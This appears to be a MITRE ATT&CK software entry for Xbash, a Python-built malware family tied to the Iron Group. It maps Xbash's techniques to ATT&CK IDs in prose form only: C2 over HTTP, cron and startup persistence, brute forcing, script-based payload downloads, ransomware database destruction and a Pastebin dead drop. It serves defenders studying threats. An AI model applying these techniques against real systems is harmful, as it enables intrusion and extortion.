S0341 Xbash
Xbash is a malware family that has targeted Linux and Microsoft Windows servers. The malware has been tied to the Iron Group, a threat actor group known for previous ransomware attacks. Xbash was developed in Python and then converted into a self-contained Linux ELF executable by using PyInstaller.1
| Item | Value |
|---|---|
| ID | S0341 |
| Associated Names | |
| Type | MALWARE |
| Version | 1.2 |
| Created | 30 January 2019 |
| Last Modified | 23 June 2020 |
| Navigation Layer | View In ATT&CK® Navigator |
Techniques Used
| Domain | ID | Name | Use |
|---|---|---|---|
| enterprise | T1071 | Application Layer Protocol | - |
| enterprise | T1071.001 | Web Protocols | Xbash uses HTTP for C2 communications.1 |
| enterprise | T1547 | Boot or Logon Autostart Execution | - |
| enterprise | T1547.001 | Registry Run Keys / Startup Folder | Xbash can create a Startup item for persistence if it determines it is on a Windows system.1 |
| enterprise | T1110 | Brute Force | - |
| enterprise | T1110.001 | Password Guessing | Xbash can obtain a list of weak passwords from the C2 server to use for brute forcing as well as attempt to brute force services with open ports.12 |
| enterprise | T1059 | Command and Scripting Interpreter | - |
| enterprise | T1059.001 | PowerShell | Xbash can use scripts to invoke PowerShell to download a malicious PE executable or PE DLL for execution.1 |
| enterprise | T1059.005 | Visual Basic | Xbash can execute malicious VBScript payloads on the victim’s machine.1 |
| enterprise | T1059.007 | JavaScript | Xbash can execute malicious JavaScript payloads on the victim’s machine.1 |
| enterprise | T1485 | Data Destruction | Xbash has destroyed Linux-based databases as part of its ransomware capabilities.1 |
| enterprise | T1486 | Data Encrypted for Impact | Xbash has maliciously encrypted victim’s database systems and demanded a cryptocurrency ransom be paid.1 |
| enterprise | T1203 | Exploitation for Client Execution | Xbash can attempt to exploit known vulnerabilities in Hadoop, Redis, or ActiveMQ when it finds those services running in order to conduct further execution.12 |
| enterprise | T1105 | Ingress Tool Transfer | Xbash can download additional malicious files from its C2 server.1 |
| enterprise | T1046 | Network Service Discovery | Xbash can perform port scanning of TCP and UDP ports.1 |
| enterprise | T1053 | Scheduled Task/Job | - |
| enterprise | T1053.003 | Cron | Xbash can create a cronjob for persistence if it determines it is on a Linux system.1 |
| enterprise | T1218 | System Binary Proxy Execution | - |
| enterprise | T1218.005 | Mshta | Xbash can use mshta for executing scripts.1 |
| enterprise | T1218.010 | Regsvr32 | Xbash can use regsvr32 for executing scripts.1 |
| enterprise | T1016 | System Network Configuration Discovery | Xbash can collect IP addresses and local intranet information from a victim’s machine.1 |
| enterprise | T1102 | Web Service | - |
| enterprise | T1102.001 | Dead Drop Resolver | Xbash can obtain a webpage hosted on Pastebin to update its C2 domain list.1 |
References
-
Xiao, C. (2018, September 17). Xbash Combines Botnet, Ransomware, Coinmining in Worm that Targets Linux and Windows. Retrieved November 14, 2018. ↩↩↩↩↩↩↩↩↩↩↩↩↩↩↩↩↩
-
Trend Micro. (2018, September 19). New Multi-Platform Xbash Packs Obfuscation, Ransomware, Coinminer, Worm and Botnet. Retrieved June 4, 2019. ↩↩